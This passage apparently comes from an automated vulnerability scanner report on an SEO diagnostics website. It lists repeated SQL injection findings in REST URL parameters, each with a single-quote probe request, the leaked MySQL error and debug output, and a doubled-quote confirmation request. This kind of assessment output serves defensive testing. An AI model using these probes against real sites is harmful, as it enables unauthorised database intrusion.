Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/2270/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/2270/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:27 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.33. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/2271'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:08 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.34. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/2271/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/2271/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:33 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:33 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.35. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/2272'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.36. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/2272/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/2272/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:23 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.37. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2837'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.38. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2837/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2837/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:16 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.39. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2838'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:43 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.40. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2838/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2838/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:01 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:01 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.41. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2839'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.42. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2839/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2839/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:10 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.43. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2840'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.44. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2840/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2840/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:57 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

1.45. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2841'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...

1.46. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
